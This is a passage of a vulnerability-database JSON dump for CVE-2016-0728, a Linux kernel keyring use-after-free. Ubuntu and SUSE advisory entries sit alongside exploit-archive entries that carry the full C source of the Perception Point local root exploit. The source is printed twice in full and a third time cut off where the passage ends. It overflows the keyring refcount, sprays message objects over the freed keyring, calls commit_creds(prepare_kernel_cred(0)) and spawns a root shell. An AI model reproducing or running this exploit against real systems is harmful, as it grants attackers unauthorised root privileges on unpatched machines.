"AV:NETWORK/AC:LOW/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}}], "ubuntu": [{"lastseen": "2020-07-02T11:37:36", "bulletinFamily": "unix", "cvelist": ["CVE-2016-0728"], "description": "Yevgeny Pats discovered that the session keyring implementation in the \nLinux kernel did not properly reference count when joining an existing \nsession keyring. A local attacker could use this to cause a denial of \nservice (system crash) or possibly execute arbitrary code with \nadministrative privileges.", "edition": 5, "modified": "2016-01-19T00:00:00", "published": "2016-01-19T00:00:00", "id": "USN-2872-2", "href": "https://ubuntu.com/security/notices/USN-2872-2", "title": "Linux kernel (Wily HWE) vulnerability", "type": "ubuntu", "cvss": {"score": 7.2, "vector": "AV:L/AC:L/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2020-07-02T11:45:16", "bulletinFamily": "unix", "cvelist": ["CVE-2016-0728"], "description": "Yevgeny Pats discovered that the session keyring implementation in the \nLinux kernel did not properly reference count when joining an existing \nsession keyring. A local attacker could use this to cause a denial of \nservice (system crash) or possibly execute arbitrary code with \nadministrative privileges.", "edition": 5, "modified": "2016-01-19T00:00:00", "published": "2016-01-19T00:00:00", "id": "USN-2873-1", "href": "https://ubuntu.com/security/notices/USN-2873-1", "title": "Linux kernel (Utopic HWE) vulnerability", "type": "ubuntu", "cvss": {"score": 7.2, "vector": "AV:L/AC:L/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2020-07-09T00:34:54", "bulletinFamily": "unix", "cvelist": ["CVE-2016-0728"], "description": "Yevgeny Pats discovered that the session keyring implementation in the \nLinux kernel did not properly reference count when joining an existing \nsession keyring. A local attacker could use this to cause a denial of \nservice (system crash) or possibly execute arbitrary code with \nadministrative privileges.", "edition": 5, "modified": "2016-01-19T00:00:00", "published": "2016-01-19T00:00:00", "id": "USN-2871-1", "href": "https://ubuntu.com/security/notices/USN-2871-1", "title": "Linux kernel vulnerability", "type": "ubuntu", "cvss": {"score": 7.2, "vector": "AV:L/AC:L/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2020-07-08T23:41:59", "bulletinFamily": "unix", "cvelist": ["CVE-2016-0728"], "description": "Yevgeny Pats discovered that the session keyring implementation in the \nLinux kernel did not properly reference count when joining an existing \nsession keyring. A local attacker could use this to cause a denial of \nservice (system crash) or possibly execute arbitrary code with \nadministrative privileges.", "edition": 5, "modified": "2016-01-19T00:00:00", "published": "2016-01-19T00:00:00", "id": "USN-2872-3", "href": "https://ubuntu.com/security/notices/USN-2872-3", "title": "Linux kernel (Raspberry Pi 2) vulnerability", "type": "ubuntu", "cvss": {"score": 7.2, "vector": "AV:L/AC:L/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2020-07-02T11:45:19", "bulletinFamily": "unix", "cvelist": ["CVE-2016-0728"], "description": "Yevgeny Pats discovered that the session keyring implementation in the \nLinux kernel did not properly reference count when joining an existing \nsession keyring. A local attacker could use this to cause a denial of \nservice (system crash) or possibly execute arbitrary code with \nadministrative privileges.", "edition": 5, "modified": "2016-01-19T00:00:00", "published": "2016-01-19T00:00:00", "id": "USN-2870-1", "href": "https://ubuntu.com/security/notices/USN-2870-1", "title": "Linux kernel vulnerability", "type": "ubuntu", "cvss": {"score": 7.2, "vector": "AV:L/AC:L/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2020-07-02T11:38:44", "bulletinFamily": "unix", "cvelist": ["CVE-2016-0728"], "description": "Yevgeny Pats discovered that the session keyring implementation in the \nLinux kernel did not properly reference count when joining an existing \nsession keyring. A local attacker could use this to cause a denial of \nservice (system crash) or possibly execute arbitrary code with \nadministrative privileges.", "edition": 5, "modified": "2016-01-19T00:00:00", "published": "2016-01-19T00:00:00", "id": "USN-2870-2", "href": "https://ubuntu.com/security/notices/USN-2870-2", "title": "Linux kernel (Trusty HWE) vulnerability", "type": "ubuntu", "cvss": {"score": 7.2, "vector": "AV:L/AC:L/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2020-07-02T11:44:04", "bulletinFamily": "unix", "cvelist": ["CVE-2016-0728"], "description": "Yevgeny Pats discovered that the session keyring implementation in the \nLinux kernel did not properly reference count when joining an existing \nsession keyring. A local attacker could use this to cause a denial of \nservice (system crash) or possibly execute arbitrary code with \nadministrative privileges.", "edition": 5, "modified": "2016-01-19T00:00:00", "published": "2016-01-19T00:00:00", "id": "USN-2871-2", "href": "https://ubuntu.com/security/notices/USN-2871-2", "title": "Linux kernel (Vivid HWE) vulnerability", "type": "ubuntu", "cvss": {"score": 7.2, "vector": "AV:L/AC:L/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2020-07-08T23:37:39", "bulletinFamily": "unix", "cvelist": ["CVE-2016-0728"], "description": "Yevgeny Pats discovered that the session keyring implementation in the \nLinux kernel did not properly reference count when joining an existing \nsession keyring. A local attacker could use this to cause a denial of \nservice (system crash) or possibly execute arbitrary code with \nadministrative privileges.", "edition": 5, "modified": "2016-01-19T00:00:00", "published": "2016-01-19T00:00:00", "id": "USN-2872-1", "href": "https://ubuntu.com/security/notices/USN-2872-1", "title": "Linux kernel vulnerability", "type": "ubuntu", "cvss": {"score": 7.2, "vector": "AV:L/AC:L/Au:N/C:C/I:C/A:C"}}], "zdt": [{"lastseen": "2018-03-13T23:14:27", "description": "Exploit for linux platform in category local exploits", "edition": 2, "published": "2016-01-19T00:00:00", "type": "zdt", "title": "Linux Kernel 4.4.1 - REFCOUNT Overflow/Use-After-Free in Keyrings Privilege Escalation (2)", "bulletinFamily": "exploit", "cvelist": ["CVE-2016-0728"], "modified": "2016-01-19T00:00:00", "id": "1337DAY-ID-25517", "href": "https://0day.today/exploit/description/25517", "sourceData": "/*\r\n# Exploit Title: Linux kernel REFCOUNT overflow/Use-After-Free in keyrings\r\n# Date: 19/1/2016\r\n# Exploit Author: Perception Point Team\r\n# CVE : CVE-2016-0728\r\n*/\r\n \r\n/* CVE-2016-0728 local root exploit\r\n modified by Federico Bento to read kernel symbols from /proc/kallsyms\r\n props to grsecurity/PaX for preventing this in so many ways\r\n \r\n $ gcc cve_2016_0728.c -o cve_2016_0728 -lkeyutils -Wall\r\n $ ./cve_2016_072 PP_KEY */\r\n \r\n#include <stdio.h>\r\n#include <stdlib.h>\r\n#include <string.h>\r\n#include <sys/types.h>\r\n#include <keyutils.h>\r\n#include <unistd.h>\r\n#include <time.h>\r\n#include <unistd.h>\r\n \r\n#include <sys/ipc.h>\r\n#include <sys/msg.h>\r\n \r\ntypedef int __attribute__((regparm(3))) (* _commit_creds)(unsigned long cred);\r\ntypedef unsigned long __attribute__((regparm(3))) (* _prepare_kernel_cred)(unsigned long cred);\r\n_commit_creds commit_creds;\r\n_prepare_kernel_cred prepare_kernel_cred;\r\n \r\n#define STRUCT_LEN (0xb8 - 0x30)\r\n#define COMMIT_CREDS_ADDR (0xffffffff810bb050)\r\n#define PREPARE_KERNEL_CREDS_ADDR (0xffffffff810bb370)\r\n \r\n \r\n \r\nstruct key_type {\r\n char * name;\r\n size_t datalen;\r\n void * vet_description;\r\n void * preparse;\r\n void * free_preparse;\r\n void * instantiate;\r\n void * update;\r\n void * match_preparse;\r\n void * match_free;\r\n void * revoke;\r\n void * destroy;\r\n};\r\n \r\n/* thanks spender - Federico Bento */\r\nstatic unsigned long get_kernel_sym(char *name)\r\n{\r\n FILE *f;\r\n unsigned long addr;\r\n char dummy;\r\n char sname[256];\r\n int ret;\r\n \r\n f = fopen(\"/proc/kallsyms\", \"r\");\r\n if (f == NULL) {\r\n fprintf(stdout, \"Unable to obtain symbol listing!\\n\");\r\n exit(0);\r\n }\r\n \r\n ret = 0;\r\n while(ret != EOF) {\r\n ret = fscanf(f, \"%p %c %s\\n\", (void **)&addr, &dummy, sname);\r\n if (ret == 0) {\r\n fscanf(f, \"%s\\n\", sname);\r\n continue;\r\n }\r\n if (!strcmp(name, sname)) {\r\n fprintf(stdout, \"[+] Resolved %s to %p\\n\", name, (void *)addr);\r\n fclose(f);\r\n return addr;\r\n }\r\n }\r\n \r\n fclose(f);\r\n return 0;\r\n}\r\n \r\nvoid userspace_revoke(void * key) {\r\n commit_creds(prepare_kernel_cred(0));\r\n}\r\n \r\nint main(int argc, const char *argv[]) {\r\n const char *keyring_name;\r\n size_t i = 0;\r\n unsigned long int l = 0x100000000/2;\r\n key_serial_t serial = -1;\r\n pid_t pid = -1;\r\n struct key_type * my_key_type = NULL;\r\n \r\n struct {\r\n long mtype;\r\n char mtext[STRUCT_LEN];\r\n } msg = {0x4141414141414141, {0}};\r\n int msqid;\r\n \r\n if (argc != 2) {\r\n puts(\"usage: ./keys <key_name>\");\r\n return 1;\r\n }\r\n \r\n printf(\"[+] uid=%d, euid=%d\\n\", getuid(), geteuid());\r\n commit_creds = (_commit_creds)get_kernel_sym(\"commit_creds\");\r\n prepare_kernel_cred = (_prepare_kernel_cred)get_kernel_sym(\"prepare_kernel_cred\");\r\n if(commit_creds == NULL || prepare_kernel_cred == NULL) {\r\n commit_creds = (_commit_creds)COMMIT_CREDS_ADDR;\r\n prepare_kernel_cred = (_prepare_kernel_cred)PREPARE_KERNEL_CREDS_ADDR;\r\n if(commit_creds == (_commit_creds)0xffffffff810bb050 || prepare_kernel_cred == (_prepare_kernel_cred)0xffffffff810bb370)\r\n puts(\"[-] You probably need to change the address of commit_creds and prepare_kernel_cred in source\");\r\n }\r\n \r\n my_key_type = malloc(sizeof(*my_key_type));\r\n \r\n my_key_type->revoke = (void*)userspace_revoke;\r\n memset(msg.mtext, 'A', sizeof(msg.mtext));\r\n \r\n // key->uid\r\n *(int*)(&msg.mtext[56]) = 0x3e8; /* geteuid() */\r\n //key->perm\r\n *(int*)(&msg.mtext[64]) = 0x3f3f3f3f;\r\n \r\n //key->type\r\n *(unsigned long *)(&msg.mtext[80]) = (unsigned long)my_key_type;\r\n \r\n if ((msqid = msgget(IPC_PRIVATE, 0644 | IPC_CREAT)) == -1) {\r\n perror(\"msgget\");\r\n exit(1);\r\n }\r\n \r\n keyring_name = argv[1];\r\n \r\n /* Set the new session keyring before we start */\r\n \r\n serial = keyctl(KEYCTL_JOIN_SESSION_KEYRING, keyring_name);\r\n if (serial < 0) {\r\n perror(\"keyctl\");\r\n return -1;\r\n }\r\n \r\n if (keyctl(KEYCTL_SETPERM, serial, KEY_POS_ALL | KEY_USR_ALL | KEY_GRP_ALL | KEY_OTH_ALL) < 0) {\r\n perror(\"keyctl\");\r\n return -1;\r\n }\r\n \r\n \r\n puts(\"[+] Increfing...\");\r\n for (i = 1; i < 0xfffffffd; i++) {\r\n if (i == (0xffffffff - l)) {\r\n l = l/2;\r\n sleep(5);\r\n }\r\n if (keyctl(KEYCTL_JOIN_SESSION_KEYRING, keyring_name) < 0) {\r\n perror(\"[-] keyctl\");\r\n return -1;\r\n }\r\n }\r\n sleep(5);\r\n /* here we are going to leak the last references to overflow */\r\n for (i=0; i<5; ++i) {\r\n if (keyctl(KEYCTL_JOIN_SESSION_KEYRING, keyring_name) < 0) {\r\n perror(\"[-] keyctl\");\r\n return -1;\r\n }\r\n }\r\n \r\n puts(\"[+] Finished increfing\");\r\n puts(\"[+] Forking...\");\r\n /* allocate msg struct in the kernel rewriting the freed keyring object */\r\n for (i=0; i<64; i++) {\r\n pid = fork();\r\n if (pid == -1) {\r\n perror(\"[-] fork\");\r\n return -1;\r\n }\r\n \r\n if (pid == 0) {\r\n sleep(2);\r\n if ((msqid = msgget(IPC_PRIVATE, 0644 | IPC_CREAT)) == -1) {\r\n perror(\"[-] msgget\");\r\n exit(1);\r\n }\r\n for (i = 0; i < 64; i++) {\r\n if (msgsnd(msqid, &msg, sizeof(msg.mtext), 0) == -1) {\r\n perror(\"[-] msgsnd\");\r\n exit(1);\r\n }\r\n }\r\n sleep(-1);\r\n exit(1);\r\n }\r\n }\r\n \r\n puts(\"[+] Finished forking\");\r\n sleep(5);\r\n \r\n /* call userspace_revoke from kernel */\r\n puts(\"[+] Caling revoke...\");\r\n if (keyctl(KEYCTL_REVOKE, KEY_SPEC_SESSION_KEYRING) == -1) {\r\n perror(\"[+] keyctl_revoke\");\r\n }\r\n \r\n printf(\"uid=%d, euid=%d\\n\", getuid(), geteuid());\r\n execl(\"/bin/sh\", \"/bin/sh\", NULL);\r\n \r\n return 0;\r\n}\n\n# 0day.today [2018-03-13] #", "cvss": {"score": 7.2, "vector": "AV:LOCAL/AC:LOW/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}, "sourceHref": "https://0day.today/exploit/25517"}, {"lastseen": "2018-03-19T11:04:11", "description": "Exploit for linux platform in category local exploits", "edition": 2, "published": "2016-01-19T00:00:00", "type": "zdt", "title": "Linux Kernel 4.4.1 - REFCOUNT Overflow/Use-After-Free in Keyrings Privilege Escalation (1)", "bulletinFamily": "exploit", "cvelist": ["CVE-2016-0728"], "modified": "2016-01-19T00:00:00", "id": "1337DAY-ID-25516", "href": "https://0day.today/exploit/description/25516", "sourceData": "/*\r\n# Exploit Title: Linux kernel REFCOUNT overflow/Use-After-Free in keyrings\r\n# Date: 19/1/2016\r\n# Exploit Author: Perception Point Team\r\n# CVE : CVE-2016-0728\r\n*/\r\n \r\n/* $ gcc cve_2016_0728.c -o cve_2016_0728 -lkeyutils -Wall */\r\n/* $ ./cve_2016_072 PP_KEY */\r\n \r\n/* EDB-Note: More information ~ http://perception-point.io/2016/01/14/analysis-and-exploitation-of-a-linux-kernel-vulnerability-cve-2016-0728/ */\r\n \r\n#include <stdio.h>\r\n#include <stdlib.h>\r\n#include <string.h>\r\n#include <sys/types.h>\r\n#include <keyutils.h>\r\n#include <unistd.h>\r\n#include <time.h>\r\n#include <unistd.h>\r\n \r\n#include <sys/ipc.h>\r\n#include <sys/msg.h>\r\n \r\ntypedef int __attribute__((regparm(3))) (* _commit_creds)(unsigned long cred);\r\ntypedef unsigned long __attribute__((regparm(3))) (* _prepare_kernel_cred)(unsigned long cred);\r\n_commit_creds commit_creds;\r\n_prepare_kernel_cred prepare_kernel_cred;\r\n \r\n#define STRUCT_LEN (0xb8 - 0x30)\r\n#define COMMIT_CREDS_ADDR (0xffffffff81094250)\r\n#define PREPARE_KERNEL_CREDS_ADDR (0xffffffff81094550)\r\n \r\n \r\n \r\nstruct key_type {\r\n char * name;\r\n size_t datalen;\r\n void * vet_description;\r\n void * preparse;\r\n void * free_preparse;\r\n void * instantiate;\r\n void * update;\r\n void * match_preparse;\r\n void * match_free;\r\n void * revoke;\r\n void * destroy;\r\n};\r\n \r\nvoid userspace_revoke(void * key) {\r\n commit_creds(prepare_kernel_cred(0));\r\n}\r\n \r\nint main(int argc, const char *argv[]) {\r\n const char *keyring_name;\r\n size_t i = 0;\r\n unsigned long int l = 0x100000000/2;\r\n key_serial_t serial = -1;\r\n pid_t pid = -1;\r\n struct key_type * my_key_type = NULL;\r\n \r\nstruct { long mtype;\r\n char mtext[STRUCT_LEN];\r\n } msg = {0x4141414141414141, {0}};\r\n int msqid;\r\n \r\n if (argc != 2) {\r\n puts(\"usage: ./keys <key_name>\");\r\n return 1;\r\n }\r\n \r\n printf(\"uid=%d, euid=%d\\n\", getuid(), geteuid()); \r\n commit_creds = (_commit_creds) COMMIT_CREDS_ADDR;\r\n prepare_kernel_cred = (_prepare_kernel_cred) PREPARE_KERNEL_CREDS_ADDR;\r\n \r\n my_key_type = malloc(sizeof(*my_key_type));\r\n \r\n my_key_type->revoke = (void*)userspace_revoke;\r\n memset(msg.mtext, 'A', sizeof(msg.mtext));\r\n \r\n // key->uid\r\n *(int*)(&msg.mtext[56]) = 0x3e8; /* geteuid() */\r\n //key->perm\r\n *(int*)(&msg.mtext[64]) = 0x3f3f3f3f;\r\n \r\n //key->type\r\n *(unsigned long *)(&msg.mtext[80]) = (unsigned long)my_key_type;\r\n \r\n if ((msqid = msgget(IPC_PRIVATE, 0644 | IPC_CREAT)) == -1) {\r\n perror(\"msgget\");\r\n exit(1);\r\n }\r\n \r\n keyring_name = argv[1];\r\n \r\n /* Set the new session keyring before we start */\r\n \r\n serial = keyctl(KEYCTL_JOIN_SESSION_KEYRING, keyring_name);\r\n if (serial < 0) {\r\n perror(\"keyctl\");\r\n return -1;\r\n }\r\n \r\n if (keyctl(KEYCTL_SETPERM, serial, KEY_POS_ALL | KEY_USR_ALL | KEY_GRP_ALL | KEY_OTH_ALL) < 0) {\r\n perror(\"keyctl\");\r\n return -1;\r\n }\r\n \r\n \r\n puts(\"Increfing...\");\r\n for (i = 1; i < 0xfffffffd; i++) {\r\n if (i == (0xffffffff - l)) {\r\n l = l/2;\r\n sleep(5);\r\n }\r\n if (keyctl(KEYCTL_JOIN_SESSION_KEYRING, keyring_name) < 0) {\r\n perror(\"keyctl\");\r\n return -1;\r\n }\r\n }\r\n sleep(5);\r\n /* here we are going to leak the last references to overflow */\r\n for (i=0; i<5; ++i) {\r\n if (keyctl(KEYCTL_JOIN_SESSION_KEYRING, keyring_name) < 0) {\r\n perror(\"keyctl\");\r\n return -1;\r\n }\r\n }\r\n \r\n puts(\"finished increfing\");\r\n puts(\"forking...\");\r\n /* allocate msg struct in the kernel rewriting the freed keyring object */\r\n for (i=0; i<64; i++) {\r\n pid = fork();\r\n if (pid == -1) {\r\n perror(\"fork\");\r\n return -1;\r\n }\r\n \r\n if (pid == 0) {\r\n sleep(2);\r\n if ((msqid = msgget(IPC_PRIVATE, 0644 | IPC_CREAT)) == -1) {\r\n perror(\"msgget\");\r\n exit(1);\r\n }\r\n for (i = 0; i < 64; i++) {\r\n if (msgsnd(msqid, &msg, sizeof(msg.mtext), 0) == -1) {\r\n perror(\"msgsnd\");\r\n exit(1);\r\n }\r\n }\r\n sleep(-1);\r\n exit(1);\r\n }\r\n }\r\n \r\n puts(\"finished forking\");\r\n sleep(5);\r\n \r\n /* call userspace_revoke from kernel */\r\n puts(\"caling revoke...\");\r\n if (keyctl(KEYCTL_REVOKE, KEY_SPEC_SESSION_KEYRING) == -1) {\r\n perror(\"keyctl_revoke\");\r\n }\r\n \r\n printf(\"uid=%d, euid=%d\\n\", getuid(), geteuid());\r\n execl(\"/bin/sh\", \"/bin/sh\", NULL);\r\n \r\n return 0;\r\n}\n\n# 0day.today [2018-03-19] #", "cvss": {"score": 7.2, "vector": "AV:LOCAL/AC:LOW/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}, "sourceHref": "https://0day.today/exploit/25516"}], "suse": [{"lastseen": "2016-09-04T12:25:39", "bulletinFamily": "unix", "cvelist": ["CVE-2016-0728"], "description": "The SUSE Linux Enterprise 12 SP1 kernel was updated to receive a security\n fix.\n\n Following security bug was fixed:\n - A reference leak in keyring handling with join_session_keyring() could\n lead to local attackers gain root privileges. (bsc#962075,\n CVE-2016-0728).\n\n", "edition": 1, "modified": "2016-01-20T21:11:28", "published": "2016-01-20T21:11:28", "id": "SUSE-SU-2016:0186-1", "href": "http://lists.opensuse.org/opensuse-security-announce/2016-01/msg00021.html", "title": "Security update for the Linux Kernel (important)", "type": "suse", "cvss": {"score": 7.2, "vector": "AV:LOCAL/AC:LOW/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}}, {"lastseen": "2016-09-04T12:40:04", "bulletinFamily": "unix", "cvelist": ["CVE-2016-0728"], "description": "The SUSE Linux Enterprise 12 kernel was updated to receive a security fix.\n\n Following security bug was fixed:\n - A reference leak in keyring handling with join_session_keyring() could\n lead to local attackers gain root privileges. (bsc#962075,\n CVE-2016-0728).\n\n", "edition": 1, "modified": "2016-01-22T18:12:30", "published": "2016-01-22T18:12:30", "id": "SUSE-SU-2016:0205-1", "href": "http://lists.opensuse.org/opensuse-security-announce/2016-01/msg00026.html", "title": "Security update for the Linux Kernel (important)", "type": "suse", "cvss": {"score": 7.2, "vector": "AV:LOCAL/AC:LOW/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}}, {"lastseen": "2016-09-04T12:14:55", "bulletinFamily": "unix", "cvelist": ["CVE-2016-0728"], "description": "This kernel live patch for Linux Kernel 3.12.51-52.34.1 fixes one security\n issue:\n\n - A reference leak in keyring handling with join_session_keyring() could\n lead to local attackers gain root privileges. (bsc#962075,\n CVE-2016-0728).\n\n", "edition": 1, "modified": "2016-02-04T19:18:40", "published": "2016-02-04T19:18:40", "id": "SUSE-SU-2016:0341-1", "href": "http://lists.opensuse.org/opensuse-security-announce/2016-02/msg00012.html", "type": "suse", "title": "Security update for Kernel live patch 10 (important)", "cvss": {"score": 7.2, "vector": "AV:LOCAL/AC:LOW/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}}, {"lastseen": "2016-09-04T11:45:49", "bulletinFamily": "unix", "cvelist": ["CVE-2016-0728", "CVE-2013-7446"], "description": "This kernel live patch for Linux Kernel 3.12.48-52.27.1 fixes two security\n issues:\n\n Fixes:\n - CVE-2016-0728: A reference leak in keyring handling with\n join_session_keyring() could lead to local attackers gain root\n privileges. (bsc#962078).\n - CVE-2013-7446: Use-after-free vulnerability in net/unix/af_unix.c in the\n Linux kernel allowed local users to bypass intended AF_UNIX socket\n permissions or cause a denial of service (panic) via crafted epoll_ctl\n calls. (bsc#955837)\n\n", "edition": 1, "modified": "2016-03-14T18:19:06", "published": "2016-03-14T18:19:06", "id": "SUSE-SU-2016:0757-1", "href": "http://lists.opensuse.org/opensuse-security-announce/2016-03/msg00045.html", "type": "suse", "title": "Security update for kernel live patch 8 (important)", "cvss": {"score": 7.2, "vector": "AV:LOCAL/AC:LOW/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}}, {"lastseen": "2016-09-04T12:10:59", "bulletinFamily": "unix", "cvelist": ["CVE-2016-0728", "CVE-2013-7446"], "description": "This kernel live patch for Linux Kernel 3.12.51-52.31.1 fixes two security\n issues:\n\n Fixes:\n - CVE-2016-0728: A reference leak in keyring handling with\n join_session_keyring() could lead to local attackers gain root\n privileges. (bsc#962078).\n - CVE-2013-7446: Use-after-free vulnerability in net/unix/af_unix.c in the\n Linux kernel allowed local users to bypass intended AF_UNIX socket\n permissions or cause a denial of service (panic) via crafted epoll_ctl\n calls. (bsc#955837)\n\n", "edition": 1, "modified": "2016-03-14T18:13:01", "published": "2016-03-14T18:13:01", "id": "SUSE-SU-2016:0747-1", "href": "http://lists.opensuse.org/opensuse-security-announce/2016-03/msg00035.html", "type": "suse", "title": "Security update for kernel live patch 9 (important)", "cvss": {"score": 7.2, "vector": "AV:LOCAL/AC:LOW/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}}, {"lastseen": "2016-09-04T12:42:10", "bulletinFamily": "unix", "cvelist": ["CVE-2016-0728", "CVE-2013-7446"], "description": "This kernel live patch for Linux Kernel 3.12.44-52.10.1 fixes two security\n issues:\n\n Fixes:\n - CVE-2016-0728: A reference leak in keyring handling with\n join_session_keyring() could lead to local attackers gain root\n privileges. (bsc#962078).\n - CVE-2013-7446: Use-after-free vulnerability in net/unix/af_unix.c in the\n Linux kernel allowed local users to bypass intended AF_UNIX socket\n permissions or cause a denial of service (panic) via crafted epoll_ctl\n calls. (bsc#955837)\n\n", "edition": 1, "modified": "2016-03-14T18:16:48", "published": "2016-03-14T18:16:48", "id": "SUSE-SU-2016:0753-1", "href": "http://lists.opensuse.org/opensuse-security-announce/2016-03/msg00041.html", "title": "Security update for kernel live patch 6 (important)", "type": "suse", "cvss": {"score": 7.2, "vector": "AV:LOCAL/AC:LOW/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}}, {"lastseen": "2016-09-04T11:49:45", "bulletinFamily": "unix", "cvelist": ["CVE-2016-0728", "CVE-2013-7446"], "description": "This kernel live patch for Linux Kernel 3.12.39-47.1 fixes two security\n issues:\n\n Fixes:\n - CVE-2016-0728: A reference leak in keyring handling with\n join_session_keyring() could lead to local attackers gain root\n privileges. (bsc#962078).\n - CVE-2013-7446: Use-after-free vulnerability in net/unix/af_unix.c in the\n Linux kernel allowed local users to bypass intended AF_UNIX socket\n permissions or cause a denial of service (panic) via crafted epoll_ctl\n calls. (bsc#955837)\n\n", "edition": 1, "modified": "2016-03-14T18:12:19", "published": "2016-03-14T18:12:19", "id": "SUSE-SU-2016:0746-1", "href": "http://lists.opensuse.org/opensuse-security-announce/2016-03/msg00034.html", "type": "suse", "title": "Security update for kernel live patch 4 (important)", "cvss": {"score": 7.2, "vector": "AV:LOCAL/AC:LOW/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}}, {"lastseen": "2016-09-04T11:22:57", "bulletinFamily": "unix", "cvelist": ["CVE-2016-0728", "CVE-2013-7446"], "edition": 1, "description": "This kernel live patch for Linux Kernel 3.12.38-44.1 fixes two security\n issues:\n\n Fixes:\n - CVE-2016-0728: A reference leak in keyring handling with\n join_session_keyring() could lead to local attackers gain root\n privileges. (bsc#962078).\n - CVE-2013-7446: Use-after-free vulnerability in net/unix/af_unix.c in the\n Linux kernel allowed local users to bypass intended AF_UNIX socket\n permissions or cause a denial of service (panic) via crafted epoll_ctl\n calls. (bsc#955837)\n\n", "modified": "2016-03-14T18:11:49", "published": "2016-03-14T18:11:49", "id": "SUSE-SU-2016:0745-1", "href": "http://lists.opensuse.org/opensuse-security-announce/2016-03/msg00033.html", "type": "suse", "title": "Security update for kernel live patch 3 (important)", "cvss": {"score": 7.2, "vector": "AV:LOCAL/AC:LOW/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}}, {"lastseen": "2016-09-04T11:25:58", "bulletinFamily": "unix", "cvelist": ["CVE-2016-0728", "CVE-2013-7446"], "description": "This kernel live patch for Linux Kernel 3.12.44-52.18.1 fixes two security\n issues:\n\n Fixes:\n - CVE-2016-0728: A reference leak in keyring handling with\n join_session_keyring() could lead to local attackers gain root\n privileges. (bsc#962078).\n - CVE-2013-7446: Use-after-free vulnerability in net/unix/af_unix.c in the\n Linux kernel allowed local users to bypass intended AF_UNIX socket\n permissions or cause a denial of service (panic) via crafted epoll_ctl\n calls. (bsc#955837)\n\n", "edition": 1, "modified": "2016-03-14T18:18:29", "published": "2016-03-14T18:18:29", "id": "SUSE-SU-2016:0756-1", "href": "http://lists.opensuse.org/opensuse-security-announce/2016-03/msg00044.html", "title": "Security update for kernel live patch 7 (important)", "type": "suse", "cvss": {"score": 7.2, "vector": "AV:LOCAL/AC:LOW/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}}, {"lastseen": "2016-09-04T12:18:27", "bulletinFamily": "unix", "cvelist": ["CVE-2016-0728", "CVE-2013-7446"], "description": "This kernel live patch for Linux Kernel 3.12.43-52.6.1 fixes two security\n issues:\n\n Fixes:\n - CVE-2016-0728: A reference leak in keyring handling with\n join_session_keyring() could lead to local attackers gain root\n privileges. (bsc#962078).\n - CVE-2013-7446: Use-after-free vulnerability in net/unix/af_unix.c in the\n Linux kernel allowed local users to bypass intended AF_UNIX socket\n permissions or cause a denial of service (panic) via crafted epoll_ctl\n calls. (bsc#955837)\n\n", "edition": 1, "modified": "2016-03-14T18:14:18", "published": "2016-03-14T18:14:18", "id": "SUSE-SU-2016:0750-1", "href": "http://lists.opensuse.org/opensuse-security-announce/2016-03/msg00038.html", "title": "Security update for kernel live patch 5 (important)", "type": "suse", "cvss": {"score": 7.2, "vector": "AV:LOCAL/AC:LOW/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}}], "exploitpack": [{"lastseen": "2020-04-01T19:04:28", "description": "\nLinux Kernel 4.4.1 - REFCOUNT Overflow Use-After-Free in Keyrings Local Privilege Escalation (2)", "edition": 1, "published": "2016-01-19T00:00:00", "title": "Linux Kernel 4.4.1 - REFCOUNT Overflow Use-After-Free in Keyrings Local Privilege Escalation (2)", "type": "exploitpack", "bulletinFamily": "exploit", "cvelist": ["CVE-2016-0728"], "modified": "2016-01-19T00:00:00", "id": "EXPLOITPACK:3459535A8A480A3A2F164DB01F4CF994", "href": "", "sourceData": "/*\n# Exploit Title: Linux kernel REFCOUNT overflow/Use-After-Free in keyrings\n# Date: 19/1/2016\n# Exploit Author: Perception Point Team\n# CVE : CVE-2016-0728\n*/\n\n/* CVE-2016-0728 local root exploit\n modified by Federico Bento to read kernel symbols from /proc/kallsyms\n props to grsecurity/PaX for preventing this in so many ways\n\n $ gcc cve_2016_0728.c -o cve_2016_0728 -lkeyutils -Wall\n $ ./cve_2016_072 PP_KEY */\n\n#include <stdio.h>\n#include <stdlib.h>\n#include <string.h>\n#include <sys/types.h>\n#include <keyutils.h>\n#include <unistd.h>\n#include <time.h>\n#include <unistd.h>\n\n#include <sys/ipc.h>\n#include <sys/msg.h>\n\ntypedef int __attribute__((regparm(3))) (* _commit_creds)(unsigned long cred);\ntypedef unsigned long __attribute__((regparm(3))) (* _prepare_kernel_cred)(unsigned long cred);\n_commit_creds commit_creds;\n_prepare_kernel_cred prepare_kernel_cred;\n\n#define STRUCT_LEN (0xb8 - 0x30)\n#define COMMIT_CREDS_ADDR (0xffffffff810bb050)\n#define PREPARE_KERNEL_CREDS_ADDR (0xffffffff810bb370)\n\n\n\nstruct key_type {\n char * name;\n size_t datalen;\n void * vet_description;\n void * preparse;\n void * free_preparse;\n void * instantiate;\n void * update;\n void * match_preparse;\n void * match_free;\n void * revoke;\n void * destroy;\n};\n\n/* thanks spender - Federico Bento */\nstatic unsigned long get_kernel_sym(char *name)\n{\n FILE *f;\n unsigned long addr;\n char dummy;\n char sname[256];\n int ret;\n\n f = fopen(\"/proc/kallsyms\", \"r\");\n if (f == NULL) {\n fprintf(stdout, \"Unable to obtain symbol listing!\\n\");\n exit(0);\n }\n\n ret = 0;\n while(ret != EOF) {\n ret = fscanf(f, \"%p %c %s\\n\", (void **)&addr, &dummy, sname);\n if (ret == 0) {\n fscanf(f, \"%s\\n\", sname);\n continue;\n }\n if (!strcmp(name, sname)) 